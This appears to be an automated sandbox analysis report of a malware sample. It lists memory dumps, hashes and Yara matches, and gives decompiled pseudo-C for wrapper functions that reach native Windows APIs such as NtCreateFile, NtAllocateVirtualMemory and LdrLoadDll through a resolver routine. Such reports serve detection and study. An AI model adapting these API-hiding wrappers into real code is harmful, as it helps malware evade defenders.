                                                                                                                                                                                    • Instruction Fuzzy Hash: BA319BB9D002589FCF10CFA9E484ADEFBB5EB0A310F24902AE814B7210D374A945CFA4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 003A9E77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 6212b8d9847ccb7cf3151e459b8bdea4f135ef119716be8b22a0d9c3296a6323
                                                                                                                                                                                    • Instruction ID: 719063386c4631454c1914cc99d7e48e20a047b58000c9cd7acd1f767ef91344
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6212b8d9847ccb7cf3151e459b8bdea4f135ef119716be8b22a0d9c3296a6323
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7A31ABB5D042589FCB10CFA9D884ADEFBB5FB0A310F24901AE814B7210D374A945CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                    • Opcode ID: a62e720836bcccf32d600b59535311f9a52c091a0aee63de15a8ba513a412f26
                                                                                                                                                                                    • Instruction ID: 41274137fada42b5e5adb0ef63c5ad3467e589aa6457c2fe65343176a55c529e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a62e720836bcccf32d600b59535311f9a52c091a0aee63de15a8ba513a412f26
                                                                                                                                                                                    • Instruction Fuzzy Hash: 974112B5D052588FCB11CFA9D844AEEFBF5EF4A304F1480AAE444B7211D3349945CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 003A5D77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: f53171109cf415c4e76d766e8531c98623c19704ac3faf62fc0598e23c8c8db5
                                                                                                                                                                                    • Instruction ID: 12dc3b78da1df5a6b18049447cd764c2f5b610f78e778fd4c0a6d3b74b0f3bbd
                                                                                                                                                                                    • Opcode Fuzzy Hash: f53171109cf415c4e76d766e8531c98623c19704ac3faf62fc0598e23c8c8db5
                                                                                                                                                                                    • Instruction Fuzzy Hash: DF3178B9D042589FCF10CFA9E484ADEFBB5AB4A310F24942AE814B7210D375A945CFA4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 003A9E77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: 5a51505b990c96b1cf7fb9a84e7f5bc1b5bbc9a34a7dadd57496ee69b7eb5be6
                                                                                                                                                                                    • Instruction ID: 5a6f738daafb4454a03db7e8a883528196e48622efcb7251073ad0a0e9574006
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5a51505b990c96b1cf7fb9a84e7f5bc1b5bbc9a34a7dadd57496ee69b7eb5be6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F3178B9D042589FCB10CFA9D884ADEFBB5AB4A310F24942AE814B7310D375A945CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                    • Opcode ID: 9344fd8f783724bf985f26ec4cdc51a479a1472e77ae4e874a9a728d484721db
                                                                                                                                                                                    • Instruction ID: 963f49cc91dedac2b9687ad379715404aa14eaaccc60c32d240d12c92e855c6f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9344fd8f783724bf985f26ec4cdc51a479a1472e77ae4e874a9a728d484721db
                                                                                                                                                                                    • Instruction Fuzzy Hash: E031BDB5D01618DFCB10CFA9D884AEEFBF5EB4A314F24946AE404B7210D374AA45CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                    • Opcode ID: 861517aa6b361dd837e01ec48248cc237a5e78fbbd1e3d3035d6293d04005de5
                                                                                                                                                                                    • Instruction ID: c9653a618f85a9c4d620b3acda570903d5f92b90b51419fd43146714a802e837
                                                                                                                                                                                    • Opcode Fuzzy Hash: 861517aa6b361dd837e01ec48248cc237a5e78fbbd1e3d3035d6293d04005de5
                                                                                                                                                                                    • Instruction Fuzzy Hash: C831CAB5D012589FCB10CFA9D884AEEFBF5AB49314F24806AE404B7220D774AA45CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107030345.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1a407e4bc5d804f048275f60f238bbce1898bfde986b132656945606a1c9deec
                                                                                                                                                                                    • Instruction ID: b257f81c392eb514ecd78ebeb336fff30c708433b4da0ee4ccc069b66cb816d1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a407e4bc5d804f048275f60f238bbce1898bfde986b132656945606a1c9deec
                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01F7314083489BD7A04B56C8887BBBBDDEF51724F18855BDF044B682C338DD00EAB2
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107030345.00000000000FD000.00000040.00000001.sdmp, Offset: 000FD000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a226740d93fb4458dee2b2067593c9753978da98a5bc9853728b5854444a6456
                                                                                                                                                                                    • Instruction ID: dfee42de5f9659bcad7556fb47d255484c47c91d701429a84b38a88237b6739b
                                                                                                                                                                                    • Opcode Fuzzy Hash: a226740d93fb4458dee2b2067593c9753978da98a5bc9853728b5854444a6456
                                                                                                                                                                                    • Instruction Fuzzy Hash: 28F0C8714043449BE7208E15C8887B7FFD8DF51724F18C45AEE045B282C3749C44DBB1
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: e1218a3e61c3329bca3364edd3f5f0a3c70cb6700acfc5577b58b6b671f1654a
                                                                                                                                                                                    • Instruction ID: 80e49ec5072ac4984840d576a35fe6505e1d2fd8276e73b7110b6e8c7ce55d66
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1218a3e61c3329bca3364edd3f5f0a3c70cb6700acfc5577b58b6b671f1654a
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0902D574D04228CFDB65DFA9C884BEEBBB2FF49305F1481A9D409A7291D7349A85CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2111192434.0000000001FC0000.00000004.00000001.sdmp, Offset: 01FC0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000004.00000002.2111200130.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 53bd9aab08806a835148cc50da9a487027701bd280a7de644b1846a1fa899090
                                                                                                                                                                                    • Instruction ID: 5e8415446c1b66e93307fbd196d7b3c1f86e061c3ab1fc126ea2bcd891b20698
                                                                                                                                                                                    • Opcode Fuzzy Hash: 53bd9aab08806a835148cc50da9a487027701bd280a7de644b1846a1fa899090
                                                                                                                                                                                    • Instruction Fuzzy Hash: 45A127A248E3C24FC7138B744C795827FB1AE23214B1E85EFD4C58E4A3E29D558AD723
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2111192434.0000000001FC0000.00000004.00000001.sdmp, Offset: 01FC0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000004.00000002.2111200130.0000000001FD0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
                                                                                                                                                                                    • Instruction ID: 9b81eee4fd0c026fe0889140e44353f9b71c92f17f60717b2311d6d8e769f76a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7dce579aaab4ef222cfcce15eadca896d17895a999a7971bfd87b45dd39ee6be
                                                                                                                                                                                    • Instruction Fuzzy Hash: 83816C7294D3C14BDB068F3448BA2C2BFB0AE1322431E86EECCD58E557D21E514BDB66
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtReadFile.NTDLL(RM,5EB6522D,FFFFFFFF,00094A11,?,?,RM,?,00094A11,FFFFFFFF,5EB6522D,00094D52,?,00000000), ref: 0009A035
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID: RM$RM
                                                                                                                                                                                    • API String ID: 2738559852-3952285560
                                                                                                                                                                                    • Opcode ID: f34ba0321003831bc5f013302836df755094ee32aba04da00c09c4194880e6ca
                                                                                                                                                                                    • Instruction ID: 4fe9282bb62cc487198b4408a59d9f79b97a974f5c25a4f6bb8249fb87692ee7
                                                                                                                                                                                    • Opcode Fuzzy Hash: f34ba0321003831bc5f013302836df755094ee32aba04da00c09c4194880e6ca
                                                                                                                                                                                    • Instruction Fuzzy Hash: D2F0F4B2200108AFDB04CF89CC80EEB77EEAF8C354F118249BE1D97242D630E811CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                    			E00099FF0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t13 = _a4;
                                                                                                                                                                                    				_t28 = _a4 + 0xc48;
                                                                                                                                                                                    				E0009AB40(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                                                                                                                    				_t6 =  &_a32; // 0x94d52
                                                                                                                                                                                    				_t12 =  &_a8; // 0x94d52
                                                                                                                                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                    			}






                                                                                                                                                                                    0x00099ff3
                                                                                                                                                                                    0x00099fff
                                                                                                                                                                                    0x0009a007
                                                                                                                                                                                    0x0009a012
                                                                                                                                                                                    0x0009a02d
                                                                                                                                                                                    0x0009a035
                                                                                                                                                                                    0x0009a039

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtReadFile.NTDLL(RM,5EB6522D,FFFFFFFF,00094A11,?,?,RM,?,00094A11,FFFFFFFF,5EB6522D,00094D52,?,00000000), ref: 0009A035
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                    • String ID: RM$RM
                                                                                                                                                                                    • API String ID: 2738559852-3952285560
                                                                                                                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                    • Instruction ID: 017600d14de7d9f7aa4667f821db2a1458b8ee00e6edc1f08bdc499dca9a5776
                                                                                                                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                                                                                                                    • Instruction Fuzzy Hash: A2F0A4B2200208ABCB14DF89DC91EEB77ADAF8C754F158248BA1D97251D630E8118BA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0008ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                                                                                                                    				char* _v8;
                                                                                                                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                                                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                                                                                                                    				char _v536;
                                                                                                                                                                                    				void* _t15;
                                                                                                                                                                                    				struct _OBJDIR_INFORMATION _t17;
                                                                                                                                                                                    				struct _OBJDIR_INFORMATION _t18;
                                                                                                                                                                                    				void* _t30;
                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                    
                                                                                                                                                                                    				_v8 =  &_v536;
                                                                                                                                                                                    				_t15 = E0009C830( &_v12, 0x104, _a8);
                                                                                                                                                                                    				_t31 = _t30 + 0xc;
                                                                                                                                                                                    				if(_t15 != 0) {
                                                                                                                                                                                    					_t17 = E0009CC50(__eflags, _v8);
                                                                                                                                                                                    					_t32 = _t31 + 4;
                                                                                                                                                                                    					__eflags = _t17;
                                                                                                                                                                                    					if(_t17 != 0) {
                                                                                                                                                                                    						E0009CED0( &_v12, 0);
                                                                                                                                                                                    						_t32 = _t32 + 8;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					_t18 = E0009B080(_v8);
                                                                                                                                                                                    					_v16 = _t18;
                                                                                                                                                                                    					__eflags = _t18;
                                                                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                                                                    						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
                                                                                                                                                                                    						return _v16;
                                                                                                                                                                                    					}
                                                                                                                                                                                    					return _t18;
                                                                                                                                                                                    				} else {
                                                                                                                                                                                    					return _t15;
                                                                                                                                                                                    				}
                                                                                                                                                                                    			}













                                                                                                                                                                                    0x0008acec
                                                                                                                                                                                    0x0008acef
                                                                                                                                                                                    0x0008acf4
                                                                                                                                                                                    0x0008acf9
                                                                                                                                                                                    0x0008ad03
                                                                                                                                                                                    0x0008ad08
                                                                                                                                                                                    0x0008ad0b
                                                                                                                                                                                    0x0008ad0d
                                                                                                                                                                                    0x0008ad15
                                                                                                                                                                                    0x0008ad1a
                                                                                                                                                                                    0x0008ad1a
                                                                                                                                                                                    0x0008ad21
                                                                                                                                                                                    0x0008ad29
                                                                                                                                                                                    0x0008ad2c
                                                                                                                                                                                    0x0008ad2e
                                                                                                                                                                                    0x0008ad42
                                                                                                                                                                                    0x00000000
                                                                                                                                                                                    0x0008ad44
                                                                                                                                                                                    0x0008ad4a
                                                                                                                                                                                    0x0008acfe
                                                                                                                                                                                    0x0008acfe
                                                                                                                                                                                    0x0008acfe

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD42
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Load
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                                                    • Opcode ID: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
                                                                                                                                                                                    • Instruction ID: 96154daf3638960c8ccea38df59efdd5219c74300595f340460a77090303f243
                                                                                                                                                                                    • Opcode Fuzzy Hash: da85868aee8bb9042b2bf2c49af3bf0221720aabf0af91d379586db70367eeda
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F0171B5E0020DABEF10EBE4DC42FDEB3B8AB54308F004195E90997642F671EB14DB91
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                    			E00099F3B(char _a1, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40, long _a44, void* _a48, long _a52) {
                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                    
                                                                                                                                                                                    				_pop(ss);
                                                                                                                                                                                    				asm("sbb dh, [eax-0x1374aae2]");
                                                                                                                                                                                    				_push( &_a1);
                                                                                                                                                                                    				_t15 = _a8;
                                                                                                                                                                                    				_t3 = _t15 + 0xc40; // 0xc40
                                                                                                                                                                                    				E0009AB40(_t31, _a8, _t3,  *((intOrPtr*)(_a8 + 0x10)), 0, 0x28);
                                                                                                                                                                                    				_t21 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x00099f3b
                                                                                                                                                                                    0x00099f3d
                                                                                                                                                                                    0x00099f40
                                                                                                                                                                                    0x00099f43
                                                                                                                                                                                    0x00099f4f
                                                                                                                                                                                    0x00099f57
                                                                                                                                                                                    0x00099f8d
                                                                                                                                                                                    0x00099f91

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00089CD3,?,00094B97,00089CD3,FFFFFFFF,?,?,FFFFFFFF,00089CD3,00094B97,?,00089CD3,00000060,00000000,00000000), ref: 00099F8D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 0af64caaf031995237b654b29704c69796a88cdd5ef37156afc4f93e4577c17e
                                                                                                                                                                                    • Instruction ID: e4fe9f3c262b4e4bdbb99e89f163f2aadb38610738b086f8fce4d89f22f3b63e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 0af64caaf031995237b654b29704c69796a88cdd5ef37156afc4f93e4577c17e
                                                                                                                                                                                    • Instruction Fuzzy Hash: B601C4B6201108AFCB48DF98DC94EEB77A9EF8C754F158248FA5D97251C630E811CBA0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E00099F40(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                                                                                                                                                    				long _t21;
                                                                                                                                                                                    				void* _t31;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t3 = _a4 + 0xc40; // 0xc40
                                                                                                                                                                                    				E0009AB40(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                                                                                                                                                    				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                                                                                                                                                    				return _t21;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x00099f4f
                                                                                                                                                                                    0x00099f57
                                                                                                                                                                                    0x00099f8d
                                                                                                                                                                                    0x00099f91

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtCreateFile.NTDLL(00000060,00089CD3,?,00094B97,00089CD3,FFFFFFFF,?,?,FFFFFFFF,00089CD3,00094B97,?,00089CD3,00000060,00000000,00000000), ref: 00099F8D
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                    • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                    • Instruction ID: b84df1c67301496695c39875aeb61613157f944ff8afa796da05639207fbee06
                                                                                                                                                                                    • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 31F0BDB2200208ABCB08CF88DC95EEB77EDAF8C754F158248BA0D97241C630E8118BA4
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0009A11C(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                    				long _t16;
                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t12 = _a4;
                                                                                                                                                                                    				_t3 = _t12 + 0xc60; // 0xca0
                                                                                                                                                                                    				E0009AB40(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                                                    				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                    				return _t16;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a123
                                                                                                                                                                                    0x0009a12f
                                                                                                                                                                                    0x0009a137
                                                                                                                                                                                    0x0009a159
                                                                                                                                                                                    0x0009a15d

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0009AD14,?,00000000,?,00003000,00000040,00000000,00000000,00089CD3), ref: 0009A159
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                                                                    • Opcode ID: 54e463819bc1a33b2d0e8b5116ecd21c491d15c0784f192e1e229b082dd85d8e
                                                                                                                                                                                    • Instruction ID: bafebfb0861fe47d6ce5f60d90d9c19a24ec71ab398eba3dcb40153413d417b5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 54e463819bc1a33b2d0e8b5116ecd21c491d15c0784f192e1e229b082dd85d8e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BF015B2200208ABCB14DF88CC81EEB77ADAF8C750F158148BE1897242C634E910CBE0
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                    			E0009A120(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                                                                                                                                                    				long _t14;
                                                                                                                                                                                    				void* _t21;
                                                                                                                                                                                    
                                                                                                                                                                                    				_t3 = _a4 + 0xc60; // 0xca0
                                                                                                                                                                                    				E0009AB40(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                                                                                                                                                    				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                                                                                                                                                    				return _t14;
                                                                                                                                                                                    			}





                                                                                                                                                                                    0x0009a12f
                                                                                                                                                                                    0x0009a137
                                                                                                                                                                                    0x0009a159
                                                                                                                                                                                    0x0009a15d

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0009AD14,?,00000000,?,00003000,00000040,00000000,00000000,00089CD3), ref: 0009A159
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                                                    • Associated: 00000005.00000002.2140345965.0000000000080000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140373133.000000000009E000.00000040.00000001.sdmp Download File
                                                                                                                                                                                    • Associated: 00000005.00000002.2140377394.000000000009F000.00000020.00000001.sdmp Download File
                                                                                                                                                                                    Yara matches
                                                                                                                                                                                    Similarity
